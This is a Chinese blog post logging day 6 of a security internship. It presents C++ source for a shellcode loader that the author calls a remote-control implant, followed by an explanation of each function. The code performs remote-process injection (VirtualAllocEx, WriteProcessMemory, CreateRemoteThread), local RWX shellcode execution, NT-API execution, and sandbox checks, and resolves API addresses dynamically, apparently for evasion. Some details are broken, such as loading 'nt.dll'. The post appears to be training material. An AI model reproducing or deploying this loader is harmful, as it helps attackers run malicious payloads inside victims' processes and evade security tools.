网络安全生产实习Day 6

于 2024-07-18 19:47:24 发布
阅读量139 收藏
点赞数 3
文章标签: cocoa macos objective-c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ynlazj/article/details/140531487
版权 
#include "myFunch.h"
#include "SandBox.h"
//上线
//字符转宽字符
//加载shellcode
wchar_t* AtoW(char** a) {
    setlocale(LC_ALL, "");

    // 原始的char*字符串
    char* char_str = *a;

    // 确定所需的wchar_t缓冲区的大小
    size_t wchar_size = mbstowcs(NULL, char_str, 0) + 1;
    if (wchar_size == (size_t)-1) {
        perror("mbstowcs");
        return 0;
    }

    // 分配wchar_t缓冲区
    wchar_t* wchar_str = (wchar_t*)malloc(wchar_size * sizeof(wchar_t));
    if (wchar_str == NULL) {
        perror("malloc");
        return 0;
    }

    // 执行转换
    mbstowcs(wchar_str, char_str, wchar_size);
    return wchar_str;
}

//读取shellcode
// 从文件中读取数据并返回
char* ReadFile(SIZE_T* length, char* file) {
    char* filename = file; // 将输入的文件名存储在变量filename中
    ifstream infile; // 创建一个输入文件流对象
    infile.open(filename, ios::out | ios::binary); // 以二进制只写模式打开文件

    // 获取文件大小
    infile.seekg(0, infile.end); // 将文件指针移动到文件末尾
    *length = infile.tellg(); // 获取文件指针当前位置,即文件大小
    infile.seekg(0, infile.beg); // 将文件指针移动回文件开头

    // 分配内存以存储文件数据
    char* data = new char[*length]; // 使用文件大小分配内存

    // 如果文件成功打开,则读取文件内容
    if (infile.is_open()) {
        cout << "reading from the file" << endl; // 输出提示信息
        infile.read(data, *length); // 读取文件内容到data中
    }

    return data; // 返回读取的文件数据
}


//注入进程
void Inject(char* argv[]) {
    SIZE_T length = 0;
    char* data;
    data = ReadFile(&length, argv[2]);

    /*LPVOID mem = VirtualAlloc(NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(mem, data, length);
    EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);*/

    HANDLE snapshot_handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);   //快照(留像)
    if (snapshot_handle != INVALID_HANDLE_VALUE) {
        // 枚举进程
        PROCESSENTRY32 process_entry;
        process_entry.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(snapshot_handle, &process_entry)) {
            do {
                // 将进程名转换为宽字符串
                std::wstring extFileName(process_entry.szExeFile);
                wchar_t* exename = AtoW(&argv[3]);
                // 如果进程名包含 "msedge.exe" 则进行以下操作  std::string::npos == 当初遍历的进程名
                if (extFileName.find(exename) != std::string::npos) {
                    // 打开进程
                    fn_OpenProcess myOpenProcess = (fn_OpenProcess)GetProcAddress(LoadLibraryA("kernel32.dll"), "OpenProcess");
                    HANDLE process_handle = myOpenProcess(PROCESS_ALL_ACCESS, FALSE, process_entry.th32ProcessID);
                    if (process_handle != NULL) {
                        // 在远程进程中分配内存
                        fn_VirtualAllocEx myVirtualAllocEx = (fn_VirtualAllocEx)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAllocEx");
                        LPVOID remote_buffer = myVirtualAllocEx(process_handle, NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
                        if (remote_buffer != NULL) {
                            SIZE_T bytes_written;
                            // 将 code 写入远程进程内存
                            if (WriteProcessMemory(process_handle, remote_buffer, data, length, &bytes_written)) {
                                std::cout << "Remote buffer address: " << remote_buffer << std::endl;

                                // 在远程进程中创建线程执行 code
                                HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);
                                if (remote_thread != NULL) {
                                    // 等待线程结束
                                    WaitForSingleObject(remote_thread, INFINITE);
                                    CloseHandle(remote_thread);
                                }
                            }
                            // 关闭远程内存句柄
                            CloseHandle(remote_buffer);
                        }
                        // 关闭进程句柄
                        CloseHandle(process_handle);
                    }
                }
            } while (Process32Next(snapshot_handle, &process_entry)); // 继续枚举下一个进程
        }
        // 关闭进程快照句柄
        CloseHandle(snapshot_handle);
    }
}

//正常上线
// 正常上线函数
VOID Normal(char* argv[]) {
    SIZE_T length = 0; // 用于存储文件大小
    char* data = NULL; // 存储从文件中读取的数据

    // 从文件中读取数据
    data = ReadFile(&length, argv[2]);

    // 获取VirtualAlloc、CreateThread和WaitForSingleObject函数的地址
    fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
    fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");
    fn_WaitForSingleObject myWaitForSingleObject = (fn_WaitForSingleObject)GetProcAddress(LoadLibraryA("kernel32.dll"), "WaitForSingleObject");

    // 在远程进程中分配内存
    LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);

    // 将数据复制到分配的内存中
    memcpy(shell_addr, data, length);

    // 创建远程线程执行代码
    HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);

    // 等待线程结束
    myWaitForSingleObject(HThread, -1);
}
//直接到缓存区
// 直接到缓存区函数
void Direct() {
    size_t length; // 用于存储数据长度
    unsigned char* data = assemble_data(&length); // 调用assemble_data函数获取数据并存储在data中

    // 获取VirtualAlloc、CreateThread和WaitForSingleObject函数的地址
    fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
    fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");
    fn_WaitForSingleObject myWaitForSingleObject = (fn_WaitForSingleObject)GetProcAddress(LoadLibraryA("kernel32.dll"), "WaitForSingleObject");

    // 在当前进程中分配内存
    LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);

    // 将数据复制到分配的内存中
    memcpy(shell_addr, data, length);

    // 创建线程执行代码
    HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);

    // 等待线程结束
    myWaitForSingleObject(HThread, -1);
}

//检查沙箱特征(沙箱与正常主机不同的地方)
//cpu核心数(少),没有外连接的设备,时间流速
void CheckSandBox() {
    Check_MulDiv_1();
    Check_MulDiv_2();

}

//NT函数调用
//Hook(钩子)对系统的函数进行更改
//
// NT函数调用函数
void NtCall(char* argv[]) {
    SIZE_T length = 0; // 用于存储文件大小
    char* data = NULL; // 存储从文件中读取的数据

    // 从文件中读取数据
    data = ReadFile(&length, argv[2]);

    // 获取NtAllocateVirtualMemory和NtCreateThreadEx函数的地址
    fn_NtAllocateVirtualMemory myNtAllocateVirtualMemory = (fn_NtAllocateVirtualMemory)GetProcAddress(LoadLibraryA("nt.dll"), "NtAllocateVirtualMemory");
    fn_NtCreateThreadEx myNtCreateThreadEx = (fn_NtCreateThreadEx)GetProcAddress(LoadLibraryA("nt.dll"), "NtCreateThreadEx");

    HANDLE hRemoteThread = NULL; // 远程线程句柄
    HANDLE process = GetCurrentProcess(); // 获取当前进程句柄

    LPVOID shell_addr = NULL; // 用于存储分配的内存地址

    // 在当前进程中分配内存
    myNtAllocateVirtualMemory(GetCurrentProcess(), &shell_addr, 0, (PULONG)&length, 0x00001000, 0x40);

    // 将数据复制到分配的内存中
    memcpy(shell_addr, data, length);

    // 创建远程线程执行代码
    myNtCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, process, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0, 0, 0, 0);

    // 等待远程线程结束
    WaitForSingleObject(hRemoteThread, -1);
}

//
// 打开浏览器并访问指定网址的函数
void Fish(char web[]) {
    char command[512] = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\""; // 设置浏览器路径
    strcat(command, web); // 将网址添加到命令中

    // 初始化进程信息结构体和启动信息结构体
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si)); // 清空si结构体
    si.cb = sizeof(si); // 设置si结构体的大小
    ZeroMemory(&pi, sizeof(pi)); // 清空pi结构体

    // 创建新进程打开浏览器并访问指定网址
    if (!CreateProcessA("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", // 浏览器程序路径
        command, // 带有网址的命令
        0, // 进程安全属性
        0, // 线程安全属性
        FALSE, // 是否继承句柄
        0, // 创建标志
        NULL, // 环境变量
        NULL, // 工作目录
        &si, // 启动信息结构体
        &pi)) // 进程信息结构体
    {
        // 如果创建进程失败,调用Direct()函数
        Direct();
    }
}

// 远控的上线程序会变成你的注入目标程序
// User,管理员,System
// 主函数
// 主函数
int main(int argc, char* argv[]) {
    // 如果没有输入参数,则直接调用Direct()函数
    if (argc == 1) {
        Direct();
    }

    // 如果有输入参数
    if (argc > 1) {
        // 如果第一个参数是"-i",则根据第二个和第三个参数执行注入功能
        if (strcmp(argv[1], "-i") == 0) {
            if (argc == 4) {
                printf("Injecting!!!\n");
                Inject(argv);
            }
            else {
                printf("注入方式:-i 路径 进程名\n");
            }
        }

        // 如果第一个参数是"-d",则执行正常启动功能
        if (strcmp(argv[1], "-d") == 0) {
            Normal(argv);
        }

        // 如果第一个参数是"-h",显示帮助信息
        if (strcmp(argv[1], "-h") == 0) {
            printf("-i Inject\n-h help\n-d normal\n-s CheckSandBox\n");
        }

        // 如果第一个参数是"-s",执行检查沙箱特征功能
        if (strcmp(argv[1], "-s") == 0) {
            CheckSandBox();
        }

        // 如果第一个参数是"-n",根据第二个参数执行NT函数调用功能
        if (strcmp(argv[1], "-n") == 0) {
            if (argc != 3) {
                printf("需要shellcode路径\n");
            }
            else {
                NtCall(argv);
            }
        }

        // 如果第一个参数是"-g",提示用户输入网址并调用Fish函数
        if (strcmp(argv[1], "-g") == 0) {
            char web[50]; // 用于存储网址
            printf("输入网址\n");
            scanf("%s", &web);
            Fish(web);
        }
    }

    return 0; // 程序正常结束
}
/*1.  int main(int argc, char* argv[]) :主函数,程序的入口点。

2.  if (argc == 1) :如果用户没有输入任何参数,则调用 Direct() 函数。

3.  if (argc > 1) :如果用户输入了参数,则根据第一个参数的值执行相应的功能。

4.  if (strcmp(argv[1], "-i") == 0) :如果第一个参数是"-i",则根据第二个和第三个参数执行注入功能。

5.  if (strcmp(argv[1], "-d") == 0) :如果第一个参数是"-d",则执行正常启动功能。

6.  if (strcmp(argv[1], "-h") == 0) :如果第一个参数是"-h",则显示帮助信息。

7.  if (strcmp(argv[1], "-s") == 0) :如果第一个参数是"-s",则执行检查沙箱特征功能。

8.  if (strcmp(argv[1], "-n") == 0) :如果第一个参数是"-n",则根据第二个参数执行NT函数调用功能。

9.  if (strcmp(argv[1], "-g") == 0) :如果第一个参数是"-g",则要求用户输入网址并调用 Fish() 函数。

10.  return 0 :程序正常结束。*/

以上代码是一个远控程序的主要部分,主要功能包括文件操作、进程注入、远程线程创建、沙箱特征检测、NT函数调用和打开浏览器访问网址等。下面是对代码的原理与作用的解释:

1. AtoW 函数:将 char* 类型的字符串转换为 wchar_t* 类型的宽字符字符串。

2. ReadFile 函数:从文件中读取数据并返回读取的数据内容。

3. Inject 函数:实现进程注入的功能,通过获取进程句柄、在远程进程中分配内存、写入数据、创建远程线程执行代码来实现注入。

4. Normal 函数:实现正常上线的功能,从文件中读取数据后,在当前进程中分配内存、复制数据、创建线程执行代码并等待线程结束。

5. Direct 函数:实现直接到缓存区的功能,通过调用 assemble_data 函数获取数据,分配内存、复制数据、创建线程执行代码并等待线程结束。

6. CheckSandBox 函数:检查沙箱特征,包括CPU核心数、外部设备连接情况、时间流速等。

7. NtCall 函数:实现NT函数调用的功能,从文件中读取数据后,在当前进程中分配内存、复制数据,使用NT函数 NtAllocateVirtualMemoryNtCreateThreadEx 创建远程线程执行代码并等待线程结束。

8. Fish 函数:打开浏览器并访问指定网址的功能,通过创建新进程打开浏览器并访问指定网址。 9. main 函数:根据命令行参数执行相应的功能,包括注入进程、正常启动、显示帮助信息、检查沙箱特征、NT函数调用和打开浏览器访问网址等功能。

lusansui.
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
嵌入式实习-day6-网络编程
11-20
网络编程: 目的:实现不同主机之间的进程间通信 协议:计算机之间交流的规则 TCP/IP:一组协议 TCP:传输协议 IP:网络协议 相关知识: 1、socket 用于网络通信的编程接口,也是一个抽象的文件,可以通过文件描述符...
信息网络安全-网络攻防21
08-03
【信息网络安全-网络攻防21】主要涵盖了网络攻防中的关键知识点,这些知识点涉及到网络安全的多个层面,包括账户安全、钓鱼攻击、恶意代码、信息泄露、信息篡改、重放攻击、服务可用性以及利用各种技术进行的攻击。...
网络安全生产实习Day 4
ynlazj的博客
07-16 962
为了使Beacon能够快速响应渗透测试人员的操作,可以选中一个会话,单击右键,在弹出的快捷菜单中选择“Interact”选项,与被控制端进行交互。在Cobalt Strike主界面中选择一个Beacon,进入交互模式,执行“screenshot”命令,获得此刻目标主机当前用户的桌面截图,如图所示。单击右键,在弹出的快捷菜单中选择“Session”"“Sleep”选项,或者在Beacon命令行环境中执行如下命令,即可调用sleep命令。exit命令用来退出当前Beacon会话,相当于放弃这个会话的权限。
网络安全生产实习Day 3
ynlazj的博客
07-15 223
选中刚刚创建的连接,在右侧的主界面中点击 "连接" 按钮,FinalShell 将会尝试连接到服务器。打开 FinalShell 后,点击界面上的 "连接" 或 "快速连接",然后选择 "新建连接"。2.数据存储和备份: 提供安全可靠的数据存储空间,用于数据备份、文件存储和数据库管理等。5.安全性和备份: 提供安全的网络环境和备份机制,确保用户数据的安全和可靠性。如果是首次连接,可能会提示你接受服务器的 SSH 密钥,确认后即可连接。填写完连接信息后,点击 "确定" 或 "保存",保存连接设置。
网络安全生产实习Day 1
ynlazj的博客
07-13 943
代码技术应用在开发自动化的威胁情报收集工具和分析平台上,帮助安全团队快速获取和处理大量的威胁数据,以及识别与组织相关的威胁活动。2.多样化的话题和观点:会议涵盖了广泛的话题,从密码学到网络攻击和防御策略,每个话题都有不同的专家和研究者分享他们的见解。大部分深网内容是合法的,例如企业内部的信息、个人的私人数据存储等。网络的不同层面提供了多样化的服务和功能,同时也引发了关于信息访问、隐私保护和网络安全的许多辩论和挑战。4.启发和激励:与会的专家和同行分享他们的研究和经验,激发了我的学术热情和探索精神。
网络安全生产实习Day 2
ynlazj的博客
07-14 600
总的来说,学习 Windows API 的进程管理和指针操作,不仅增强了对操作系统底层机制的理解,也为开发高效、稳定和功能丰富的应用程序奠定了基础。1.声明和定义分离:头文件通常包含函数、类和变量的声明,而实际的实现则在相应的源文件(.cpp文件)中。头文件应该只包含必要的声明,具体的实现应该放在对应的源文件(.cpp 文件)中。内存管理:在使用指针时,需要注意内存的分配和释放。它们充当了代码模块之间的接口。通过遵循这些细节和最佳实践,可以帮助提高代码的可读性、可维护性,同时避免常见的编译问题和错误。
网络安全生产实习Day 5
ynlazj的博客
07-17 415
这段代码是一个简单的远程控制工具的实现,主要功能包括文件读取、进程注入和普通程序执行三个部分。
生产实习day4
qq_63440850的博客
07-10 1437
网安学习day4:本文记录学习SQL注入的基础知识与实战测试。在深入探索SQL注入这一安全漏洞的过程中,sqli-labs无疑是一个宝贵的资源,它提供了一系列精心设计的挑战,帮助学习者从基础到高级逐步掌握SQL注入的技巧和防御方法。在完成Less 1、Less 5、Less 7和Less 8这几个关卡后,我收获颇丰。Less 1作为sqli-labs的入门关卡,让我初步了解了SQL注入的基本概念。
生产实习day3
qq_63440850的博客
07-09 493
网安学习day3:本文记录学习渗透的思路,工具和方式。1.渗透测试报告一般包含高中危漏洞数量,存在漏洞的地址,漏洞的额复现过程,漏洞导致的危害,修复建议;csrf , 中文全称叫做客户端请求伪造 , 是建立在会话之上的攻击 , 欺骗用户访问恶意的url , 如转账和添加管理员用户程序员在开发的时候,未对相关页面进行token和REFERER判断,造成攻击者可构造自己的URL地址欺 骗目标用户进行点击访问。
生产实习day03
qq_63440850的博客
07-09 868
网安学习day3:本文记录学习渗透的思路,工具和方式。在开始之前,我深入学习了CC攻击的原理,它主要通过大量合法的请求占用目标服务器资源,使其无法处理正常请求,从而达到拒绝服务(DoS)或分布式拒绝服务(DDoS)的效果。我使用了ab命令和siege命令尝试对网站进行测试。本次测试我明白了模拟攻击不仅是为了测试服务器的脆弱性,更重要的是思考并实践有效的防御策略。而FOFA提供了丰富的搜索语法和过滤条件,使得快速定位目标成为可能。
生产实习day7
qq_63440850的博客
07-13 385
网安学习day7:本文记录学习Jboss工具检测漏洞。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
网络安全通告服务方案.docx
06-29
- 安全威胁通告:涵盖0-day攻击、系统漏洞和网络攻击的应对策略。 - 紧急通告:针对重大或突发情况发布,督促客户尽快修复漏洞。 6. 服务方式 以年度服务为基础,通过电子邮件定期发送安全通告,紧急情况下不定期...
网络安全工程师(千峰教育)笔记
11-03
b站的千峰老师的网络安全工程师的系列课程的笔记,自己整理的,pdf版本,内容包含day2--------day24。
【2024最新】C++读写优化超详细解析(cin优化+普通快读+fread)_输入输出优化_快读快写_算法竞赛
YLCHUP的博客
07-14 1019
2024最新,超级详细的解读。新手也可以看得懂!一文走进输入输出优化的世界!
实战打靶集锦-31-monitoring
阿尔泰野狼的博客
07-17 480
本文简要介绍了博主的一次打靶经历,中间涉及SMTP渗透、SSH爆破、Nagios的EXP利用等内容。
河南萌新联赛2024第(一)场:河南农业大学
最新发布
a13997460860的博客
07-17 472
由数学知识我们可以知道当被除数越大,除数越小的时候值最大,所以我们尽可能让第一个数最大,但是由于t次移动的限制,我们可能做不到将第一个数变成最大的,因此我们用一个数组来存放每个数字移动到最左边的步数,再将数组排个序,在t允许的情况下,我们首先考虑最大的移动。所以当n为17时,结果是5;这一题说实话,没咋看懂,图的部分还没咋学,但是凭借我闯荡牛客那么久就知道这题不难,所以我直接就对半砍,然后再相乘。将数组先降序排序,看最大的是否为1,如果为1的话就进行2操作,否则进行1操作,最后再遍历一遍输出总和。
C++基础入门(下)
wer24_25的博客
07-14 1074
C++基础入门,小白也能轻松读懂!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值